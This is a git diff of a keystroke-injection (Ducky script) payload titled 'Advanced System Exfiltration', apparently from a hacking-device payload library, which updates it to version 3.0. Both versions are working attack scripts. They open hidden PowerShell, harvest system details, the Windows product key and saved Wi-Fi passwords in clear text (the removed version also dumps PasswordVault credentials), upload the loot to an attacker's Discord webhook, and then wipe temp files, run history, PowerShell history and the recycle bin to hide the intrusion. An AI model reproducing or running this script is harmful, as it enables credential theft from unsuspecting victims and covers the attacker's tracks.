diff --git a/payloads/library/exfiltration/A.S.E - Advanced_System_Exfiltration b/payloads/library/exfiltration/A.S.E - Advanced_System_Exfiltration index 0b5a53e..0595f5f 100644 --- a/payloads/library/exfiltration/A.S.E - Advanced_System_Exfiltration +++ b/payloads/library/exfiltration/A.S.E - Advanced_System_Exfiltration @@ -1,437 +1,155 @@ REM Title: A.S.E - Advanced_System_Exfiltration REM Author: LulzAnarchyAnon -REM Description: This slow, and steady staged payload takes it's time and gleans detailed system information using -REM powershell, Ducky script and notepad. First hidden powershells are opened in stages, and payloads are deployed to -REM collect the target computers system information, Then a notepad.txt file named loot is created with all -REM the gleaned information, and hidden in the Public Users folder C:\Users\Public\loot.txt The loot is then -REM exfiltrated using a Discord webhook. In the final stage of the payload the loot.txt file, the recycling bin -REM contents, the temp folder contents and powershell history are all deleted. +REM Description: This payload gleans detailed system information from the target system using powershell, ducky +REM and notepad. First a hidden powershell is opened, and a payload is deployed to collect the target computers +REM system information. Then a notepad file named loot is created with all the gleaned information, and hidden in +REM the public Users folder C:\Users\Public\loot.txt of the target system. The loot is then exfiltrated using a +REM Discord webhook. In the final stage of the payload the loot.txt file, the recycling bin contents, the temp +REM folder contents and powershell history are all deleted. REM Target: Windows 10 & 11 REM Props: iamjakoby, HAK5 and a huge shout out to O.MG!!! -REM Version: 1.0 +REM Version: 3.0 REM Category: Exfiltration -GUI r -DELAY 200 -STRING powershell -windowstyle hidden -DELAY 200 -ENTER -DELAY 500 -STRING Get-CimInstance -ClassName Win32_ComputerSystem -DELAY 5000 -ENTER -DELAY 5000 -STRING Out-File C:\Users\Public\loot.txt -Force -append -DELAY 500 -ENTER -DELAY 500 -STRING exit -DELAY 200 -ENTER -DELAY 1000 - -GUI r -DELAY 200 -STRING powershell -windowstyle hidden -DELAY 200 -ENTER -DELAY 500 -STRING systeminfo | -DELAY 5000 -ENTER -DELAY 5000 -STRING Out-File C:\Users\Public\loot.txt -Force -append -DELAY 500 -ENTER -DELAY 500 -STRING exit -DELAY 200 -ENTER -DELAY 1000 - -GUI r -DELAY 200 -STRING powershell -windowstyle hidden -DELAY 200 -ENTER -DELAY 500 -STRING Get-CimInstance -ClassName SoftwareLicensingService | Select-Object -ExpandProperty OA3xOriginalProductKey | -DELAY 5000 -ENTER -DELAY 5000 -STRING Out-File C:\Users\Public\loot.txt -Force -append -DELAY 500 -ENTER -DELAY 500 -STRING exit -DELAY 200 -ENTER -DELAY 1000 - -GUI r -DELAY 200 -STRING powershell -windowstyle hidden -DELAY 200 -ENTER -DELAY 500 -STRING $networkAdapters | Select-Object Name, MACAddress, Speed | -DELAY 5000 -ENTER -DELAY 5000 -STRING Out-File C:\Users\Public\loot.txt -Force -append -DELAY 500 -ENTER -DELAY 500 -STRING exit -DELAY 200 -ENTER -DELAY 1000 - -GUI r -DELAY 200 -STRING powershell -windowstyle hidden -DELAY 200 -ENTER -DELAY 500 -STRING $networkAdapters = Get-CimInstance -ClassName CIM_NetworkAdapter | -DELAY 5000 -ENTER -DELAY 5000 -STRING Out-File C:\Users\Public\loot.txt -Force -append -DELAY 500 -ENTER -DELAY 500 -STRING exit -DELAY 200 -ENTER -DELAY 1000 GUI r DELAY 200 STRING powershell -windowstyle hidden DELAY 200 ENTER -DELAY 500 -STRING $diskDrives = Get-CimInstance -ClassName CIM_DiskDrive | +DELAY 200 +STRING Get-CimInstance -ClassName SoftwareLicensingService | Select-Object -ExpandProperty OA3xOriginalProductKey | Out-File C:\Users\Public\loot.txt -Force -append DELAY 5000 ENTER -DELAY 5000 -STRING Out-File C:\Users\Public\loot.txt -Force -append -DELAY 500 -ENTER -DELAY 500 -STRING exit -DELAY 200 -ENTER -DELAY 1000 - -GUI r -DELAY 200 -STRING powershell -windowstyle hidden -DELAY 200 -ENTER -DELAY 500 -STRING $os = Get-CimInstance -ClassName CIM_OperatingSystem | -DELAY 5000 -ENTER -DELAY 5000 -STRING Out-File C:\Users\Public\loot.txt -Force -append -DELAY 500 -ENTER -DELAY 500 -STRING exit -DELAY 200 -ENTER -DELAY 1000 - -GUI r -DELAY 200 -STRING powershell -windowstyle hidden -DELAY 200 -ENTER -DELAY 500 -STRING Get-NetIPAddress | -DELAY 5000 -ENTER -DELAY 5000 -STRING Out-File C:\Users\Public\loot.txt -Force -append -DELAY 500 -ENTER -DELAY 500 -STRING exit -DELAY 200 -ENTER -DELAY 1000 - -GUI r -DELAY 200 -STRING powershell -windowstyle hidden -DELAY 200 -ENTER -DELAY 500 -STRING Get-DnsClient | -DELAY 5000 -ENTER -DELAY 5000 -STRING Out-File C:\Users\Public\loot.txt -Force -append -DELAY 500 -ENTER -DELAY 500 -STRING exit -DELAY 200 -ENTER -DELAY 1000 - -GUI r -DELAY 200 -STRING powershell -windowstyle hidden -DELAY 200 -ENTER -DELAY 500 -STRING Get-CimInstance -ClassName SoftwareLicensingService | Select-Object -ExpandProperty OA3xOriginalProductKey | -DELAY 5000 -ENTER -DELAY 5000 -STRING Out-File C:\Users\Public\loot.txt -Force -append -DELAY 500 -ENTER -DELAY 500 -STRING exit -DELAY 200 -ENTER -DELAY 1000 - - -GUI r -DELAY 200 -STRING powershell -windowstyle hidden -DELAY 200 -ENTER -DELAY 500 -STRING -STRING [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] -ENTER -STRING $vault = New-Object Windows.Security.Credentials.PasswordVault -ENTER -STRING $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } | -DELAY 500 -ENTER -DELAY 500 -STRING Out-File C:\Users\Public\loot.txt -Force -append -DELAY 500 -ENTER -DELAY 500 -STRING exit -DELAY 200 -ENTER -DELAY 1000 - -GUI r -DELAY 200 -STRING powershell -windowstyle hidden -DELAY 200 -ENTER -DELAY 500 -STRING (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize | -DELAY 5000 -ENTER -DELAY 5000 -STRING Out-File C:\Users\Public\loot.txt -Force -append -DELAY 500 -ENTER -DELAY 500 -STRING exit -DELAY 200 -ENTER -DELAY 1000 - -GUI r -DELAY 200 -STRING powershell -windowstyle hidden -ENTER -DELAY 500 -STRING Get-ComputerInfo | -DELAY 5000 -ENTER -DELAY 5000 -STRING Out-File C:\Users\Public\loot.txt -Force -append -DELAY 500 -ENTER -DELAY 500 -STRING exit -DELAY 200 -ENTER DELAY 2000 - -GUI r -DELAY 200 -STRING powershell -windowstyle hidden -DELAY 200 +STRING Get-CimInstance -ClassName Win32_ComputerSystem | Out-File C:\Users\Public\loot.txt -Force -append +DELAY 2000 ENTER -DELAY 500 -STRING Get-CimInstance -ClassName Win32_LogicalDisk -Filter "DriveType=3" -DELAY 5000 +DELAY 2000 +STRING systeminfo | Out-File C:\Users\Public\loot.txt -Force -append +DELAY 2000 ENTER -DELAY 5000 -STRING Out-File C:\Users\Public\loot.txt -Force -append -DELAY 500 +DELAY 2000 +STRING Get-DnsClient | Out-File C:\Users\Public\loot.txt -Force -append +DELAY 2000 ENTER -DELAY 500 -STRING exit -DELAY 200 +DELAY 2000 +STRING Get-ComputerInfo | Out-File C:\Users\Public\loot.txt -Force -append +DELAY 2000 ENTER -DELAY 1000 - -GUI r -DELAY 200 -STRING powershell -windowstyle hidden -DELAY 200 +DELAY 2000 +STRING (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize | Out-File C:\Users\Public\loot.txt -Force -append +DELAY 2000 ENTER -DELAY 500 -STRING Get-CimInstance -ClassName Win32_BIOS -DELAY 5000 +DELAY 2000 +STRING Get-CimInstance -ClassName Win32_LogicalDisk -Filter "DriveType=3" | Out-File C:\Users\Public\loot.txt -Force -append +DELAY 2000 ENTER -DELAY 5000 -STRING Out-File C:\Users\Public\loot.txt -Force -append -DELAY 500 +DELAY 2000 +STRING Get-CimInstance -ClassName Win32_BIOS | Out-File C:\Users\Public\loot.txt -Force -append +DELAY 2000 ENTER -DELAY 500 -STRING exit -DELAY 200 +DELAY 2000 +STRING Get-CimInstance -ClassName Win32_Processor | Select-Object -ExcludeProperty "CIM*" | Out-File C:\Users\Public\loot.txt -Force -append +DELAY 2000 ENTER -DELAY 1000 - -GUI r -DELAY 200 -STRING powershell -windowstyle hidden -DELAY 200 -ENTER -DELAY 500 -STRING Get-CimInstance -ClassName Win32_Processor | Select-Object -ExcludeProperty "CIM*" -DELAY 5000 -ENTER -DELAY 5000 -STRING Out-File C:\Users\Public\loot.txt -Force -append -DELAY 500 -ENTER -DELAY 500 -STRING exit -DELAY 200 -ENTER -DELAY 1000 - -GUI r -DELAY 200 -STRING powershell -windowstyle hidden -DELAY 200 -ENTER -DELAY 200 +DELAY 2000 STRING function Upload-Discord { -DELAY 500 +DELAY 2000 ENTER -DELAY 200 +DELAY 2000 STRING [CmdletBinding()] -DELAY 500 +DELAY 2000 ENTER -DELAY 200 +DELAY 2000 STRING param ( -DELAY 500 +DELAY 2000 ENTER -DELAY 200 +DELAY 2000 STRING [parameter(Position=0,Mandatory=$False)] -DELAY 500 +DELAY 2000 ENTER -DELAY 200 +DELAY 2000 STRING [string]$file, -DELAY 500 +DELAY 2000 ENTER -DELAY 200 +DELAY 2000 STRING [parameter(Position=1,Mandatory=$False)] -DELAY 500 +DELAY 2000 ENTER -DELAY 200 +DELAY 2000 STRING [string]$text -DELAY 500 +DELAY 2000 ENTER -DELAY 200 +DELAY 2000 STRING ) -DELAY 500 +DELAY 2000 ENTER -DELAY 200 +DELAY 2000 STRING $hookurl = 'YOUR DISCORD WEBHOOK HERE' -DELAY 500 +DELAY 2000 ENTER -DELAY 200 +DELAY 2000 STRING $Body = @{ -DELAY 500 +DELAY 2000 ENTER -DELAY 200 +DELAY 2000 STRING 'username' = $env:"YOUR DISCORD USERNAME HERE" -DELAY 500 +DELAY 2000 ENTER -DELAY 200 +DELAY 2000 STRING 'content' = $text -DELAY 500 +DELAY 2000 ENTER -DELAY 200 +DELAY 2000 STRING } -DELAY 500 +DELAY 2000 ENTER -DELAY 200 +DELAY 2000 STRING if (-not ([string]::IsNullOrEmpty($text))){ -DELAY 500 +DELAY 2000 ENTER -DELAY 200 +DELAY 2000 STRING Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)}; -DELAY 500 +DELAY 2000 ENTER -DELAY 200 +DELAY 2000 STRING curl.exe -F "file1=@$file" $hookurl -DELAY 200 +DELAY 2000 ENTER -DELAY 200 +DELAY 2000 STRING if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl} -DELAY 500 +DELAY 2000 ENTER -DELAY 200 +DELAY 2000 STRING } -DELAY 200 +DELAY 2000 ENTER -DELAY 200 +DELAY 2000 STRING Upload-Discord -file "C:\Users\Public\loot.txt" -DELAY 200 +DELAY 2000 ENTER -DELAY 1000 -STRING exit -ENTER -DELAY 1000 - -GUI r -DELAY 200 -STRING powershell -windowstyle hidden -DELAY 200 -ENTER -DELAY 500 +DELAY 2000 STRING Remove-Item "C:\Users\Public\loot.txt" -DELAY 500 +DELAY 2000 ENTER -DELAY 500 +DELAY 2000 STRING rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue -DELAY 500 +DELAY 2000 ENTER -DELAY 500 +DELAY 2000 STRING reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f -DELAY 500 +DELAY 2000 ENTER -DELAY 500 +DELAY 2000 STRING Remove-Item (Get-PSreadlineOption).HistorySavePath -DELAY 500 +DELAY 2000 ENTER -DELAY 500 +DELAY 2000 STRING Clear-RecycleBin -Force -ErrorAction SilentlyContinue -DELAY 500 +DELAY 200 ENTER -DELAY 500 +DELAY 200 STRING exit DELAY 200 ENTER